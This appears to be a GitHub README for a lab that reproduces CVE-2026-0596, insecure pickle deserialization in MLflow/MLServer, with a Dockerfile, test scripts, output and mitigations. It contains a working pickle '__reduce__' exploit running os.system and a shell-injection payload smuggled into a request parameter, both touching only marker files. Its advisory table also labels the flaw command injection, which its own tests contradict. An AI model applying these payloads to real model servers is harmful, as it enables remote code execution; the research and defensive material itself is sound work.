SparshBiswas-AI/CVE-2026-0596-Reproduction

GitHub: SparshBiswas-AI/CVE-2026-0596-Reproduction

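A security research lab environment for reproducing and verifying CVE-2026-0596, an insecure-deserialization vulnerability in MLflow/MLServer that leads to arbitrary code execution.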


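# CVE-2026-0596: Arbitrary Code Execution via Insecure Deserialization in the MLflow Ecosystem

A detailed security research report covering the verification, underlying mechanism, and architectural weaknesses of the untrusted model-loading pipeline in `mlflow==2.11.1` and `mlserver==1.3.5`.

## ⚠️ Vulnerability Intelligence Advisory: CVE-2026-0596

| Indicator | Details |
| :--- | :--- |
| **Vulnerability ID** | CVE-2026-0596 / GHSA-rvhj-8chj-8v3c |
| **CWE** | CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) |
| **CVSS v3.1 Base Score** | **9.6 Critical** (CNA: huntr.dev) / 7.8 High (NVD) |
| **Impact Vector** | Adjacent network, low complexity, no privileges required, no user interaction |
| **Affected Ecosystem** | `mlflow/mlflow` (all legacy deployments served with `enable_mlserver=True`) |

### 🔍 Architectural Vulnerability Deep Dive

#### Background

MLflow integrates with Seldon's `MLServer` to provide high-performance, enterprise-grade model serving. When launching a model server through the command-line interface or the tracking server API, developers pass a configuration flag:

```
enable_mlserver = True
```

## 📋 Executive Summary

This lab environment evaluates how machine-learning model-serving frameworks behave at runtime when they parse user-supplied input parameters and artifact metadata. MLServer's API-facing parameter parsing keeps raw string values isolated as literals, which prevented classic OS command injection via shell metacharacters in this lab. The underlying Python runtime, however, remains structurally vulnerable to **Insecure Deserialization** when it ingests legacy serialized object streams (`.pkl` / `pickle`).

* **Vulnerability Type:** Insecure Deserialization (CWE-502) / Arbitrary Code Execution
* **Impact:** Critical (Remote Code Execution within the container context)
* **Affected Components:** Model ingestion, artifact download subsystems, and `pickle`-based prediction backends.

---

## 🛠️ Lab Architecture and Setup

The reproduction environment is containerized with Docker to isolate the operating-system layer and simulate a production-grade machine-learning model endpoint.

### 1. Docker Environment Configuration (`Dockerfile`)

```dockerfile
FROM python:3.10-slim

WORKDIR /app

# Install native system binaries
RUN apt-get update && apt-get install -y \
    curl \
    build-essential \
    && rm -rf /var/lib/apt/lists/*

# Pin the exact framework versions under test
RUN pip install --no-cache-dir \
    mlflow==2.11.1 \
    mlserver==1.3.5 \
    mlserver-mlflow==1.3.5

# Generate the local model artifact at build time
COPY generate_model.py /app/generate_model.py
RUN python /app/generate_model.py

EXPOSE 5000
```

### 2. Native Model Blueprint (`generate_model.py`)

```python
import os

import mlflow
import mlflow.pyfunc


class DummyModel(mlflow.pyfunc.PythonModel):
    """Pass-through model: returns its input unchanged."""

    def predict(self, context, model_input):
        return model_input


if __name__ == "__main__":
    model_path = "/app/saved_model"
    # Skip saving if the model directory already exists
    if not os.path.exists(model_path):
        mlflow.pyfunc.save_model(path=model_path, python_model=DummyModel())
```

## 🔬 Vulnerability Analysis and Verification

### Test Cycle A: API Parameter Injection Boundary (Passed)

The initial test attempted to pass a shell-terminating payload sequence (`; touch /tmp/poc_success_marker.txt #`) through the `params` object of the `/invocations` REST endpoint:

```json
{
  "dataframe_split": {
    "columns": ["machine_input"],
    "data": [["test_data"]]
  },
  "params": {
    "custom_runtime_param": "default_runtime; touch /tmp/poc_success_marker.txt #"
  }
}
```

**Result:** **Negative.** The framework treated the payload as an inert, unevaluated string literal. This indicates that the engine passes input values directly into Python memory rather than interpolating them into shell arguments through a raw command wrapper.

### Test Cycle B: Insecure Deserialization Hook (Exploited)

Because MLflow and MLServer ingest serialized Python objects, the core risk shifts from string evaluation to object-graph reconstruction. A custom verification script embeds an execution trigger directly into a simulated model stream using Python's `__reduce__` pickling hook.

#### 1. Exploit Vector Script (`trigger_native.py`)

```python
import os
import pickle


class ExploitModel:
    def __reduce__(self):
        # __reduce__ tells pickle how to rebuild this object: a callable plus its arguments.
        # Returning (os.system, (cmd,)) makes pickle.load() call os.system(cmd) while loading.
        return (os.system, ("touch /tmp/native_success_marker.txt",))


if __name__ == "__main__":
    payload_path = "vulnerable_model.pkl"

    # Serialize the code-execution payload into a pseudo-model file
    with open(payload_path, "wb") as f:
        pickle.dump(ExploitModel(), f)

    # Simulate an application or model server unpickling the artifact
    with open(payload_path, "rb") as f:
        pickle.load(f)
```

#### 2. Execution and Payload Verification

Copy the script into the sandbox container and run it to simulate the backend loading sequence (the commands assume a running container named `mlflow_sandbox`):

```shell
# Stage the payload script in the sandbox
docker cp trigger_native.py mlflow_sandbox:/app/trigger_native.py

# Run the deserialization routine
docker exec -it mlflow_sandbox python /app/trigger_native.py
```

#### 3. Verification Output

Listing the container's `/tmp` directory confirms that the injected command ran during object reconstruction:

```
PS C:\Users\Sparsh Biswas\mlflow-security-lab> docker exec -it mlflow_sandbox ls -la /tmp/
total 8
drwxrwxrwt 1 root root 4096 May 18 10:31 .
drwxr-xr-x 1 root root 4096 May 18 10:31 ..
-rw-r--r-- 1 root root 0 May 18 10:31 native_success_marker.txt
```

## 🧠 Root Cause Mechanism

The issue stems from implicit trust in the model artifact storage layer. Standard Python `.pkl` / `pickle` files are not flat configuration records; they are a sequence of opcodes that the unpickler executes to rebuild nested objects. When `pickle.load()` processes the stream, it carries out the instructions that the object's `__reduce__` hook produced at serialization time. Here, those instructions make the target application call a native system function (`os.system`), which runs the command through a shell, long before any data-type validation or machine-learning inference begins.

## 🛡️ Production Mitigation Strategies

### 1. Enforce Safe Deserialization Formats

Deprecate legacy serialization layers (`pickle`, `joblib`, `marshal`) across all training and deployment pipelines. Replace them with structured, data-only formats:

* **Safetensors (recommended):** Restricts stored data to raw numeric tensors, with no code-execution layer.
* **ONNX (Open Neural Network Exchange):** Enforces a static computation-graph schema, preventing arbitrary runtime evaluation hooks.

### 2. Isolate and Sandbox the Runtime

If your pipeline strictly requires legacy model formats:

* Run the execution wrapper as a **non-root user** inside the container (`USER 10001`).
* Mount the filesystem **read-only** where applicable to block file-creation attacks.
* Drop all container capabilities (`cap_drop: [ALL]`) and isolate the pod from networks that expose sensitive metadata endpoints.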
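Where legacy pickles cannot be retired immediately, a loader can at least refuse to resolve arbitrary globals such as `os.system`. The sketch below is not part of the original lab: it adapts the "Restricting Globals" pattern from the Python `pickle` documentation and adds a static opcode scan with `pickletools`. The allow-list `SAFE_GLOBALS` and the helpers `scan_pickle`, `RestrictedUnpickler`, and `restricted_loads` are hypothetical names chosen for illustration. An allow-list narrows the attack surface but does not make pickle safe, so treat this as a stopgap alongside the data-only formats and isolation measures above.

```python
import io
import os
import pickle
import pickletools

# Hypothetical allow-list: (module, name) pairs this loader is willing to resolve.
SAFE_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("collections", "OrderedDict"),
}

# Opcodes that import a global or invoke a callable during unpickling.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def scan_pickle(data: bytes) -> list[str]:
    """Statically list risky opcodes; genops only decodes, it never executes."""
    findings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in RISKY_OPCODES:
            findings.append(opcode.name if arg is None else f"{opcode.name} {arg!r}")
    return findings


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on the allow-list."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class ExploitModel:
    # Same shape as trigger_native.py, but with a harmless command for the demo.
    def __reduce__(self):
        return (os.system, ("echo should-not-run",))


if __name__ == "__main__":
    payload = pickle.dumps(ExploitModel())
    print(scan_pickle(payload))  # flags the global lookup and the REDUCE call

    try:
        restricted_loads(payload)
    except pickle.UnpicklingError as exc:
        print(exc)  # os.system is never called

    # Plain containers unpickle without touching find_class at all.
    print(restricted_loads(pickle.dumps({"weights": [0.1, 0.2]})))
```

With CPython's default protocol the scan typically reports `STACK_GLOBAL` and `REDUCE`, and on Linux the error names `posix.system`, because pickle records the function's defining module rather than `os`. The scanner is deliberately conservative: legitimate objects such as `OrderedDict` also emit `REDUCE`, so a hit is a signal for review rather than proof of tampering.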

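Tags: CISA project, CVE, MLflow, MLOps, MLServer, arbitrary code execution, deserialization, command injection, security lab, security testing, intelligence gathering, offensive security, attack surface analysis, digital signatures, machine-learning framework security, model serving, vulnerability research, demo environment, request interception, reverse-engineering tools, verification scripts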